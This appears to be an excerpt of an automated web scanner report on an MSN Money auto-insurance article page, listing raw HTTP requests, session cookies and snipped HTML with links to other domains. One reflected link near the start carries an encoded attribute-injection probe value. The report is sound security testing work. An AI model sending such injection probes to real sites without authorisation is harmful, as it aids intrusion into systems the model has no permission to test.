<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
ry', 'True','1');" href="http://money.msn.com/auto-insurance/article.aspx?b9684%2522a%253d%2522b%2522e6895580fdf=1&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
True','0');" href="http://money.msn.com/auto-insurance/article.aspx?b9684%2522a%253d%2522b%2522e6895580fdf=1&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XEdI4lPH5YXQoFdzX6dolUuJi4zgESkkx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X_8ey5stO4VZuowOF1vLLqcSOHTm1zM-b?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">tyler coghill</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mNepHp8dR3BaNz273vmz1qC7k6Dr5UxqZumLTSkdmN_tUOubTVlnmMKrArPgUcaisLvPkNqvfzjWEn0neZZmWqw" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Bill H</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&amp;form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&amp;form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&amp;form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&amp;form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&amp;form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&amp;form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.176. http://money.redacted/auto-insurance/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:00 GMT
Content-Length: 148168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353401&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i>&#160;comes from&#160;Barbara Marquand&#160;at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
);" href="http://money.msn.com/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&amp;GT1=33004&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ef="http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&amp;GT1=33004&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Bill H</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xu-wZWlDmiUvCCrBuuOhmcI8fmnkZ4HfR?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X0Jb-asV9wuh8rlzoSI4St2M52NriGjQX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XtSNSqQgFZPsfB459aCi3rdya394_WRos?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&amp;form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&amp;form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&amp;form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&amp;form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&amp;form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&amp;form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.177. http://money.redacted/auto-insurance/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=b9ca87d1597640e8986ce7a895915a2c; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:13 GMT
Content-Length: 148161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
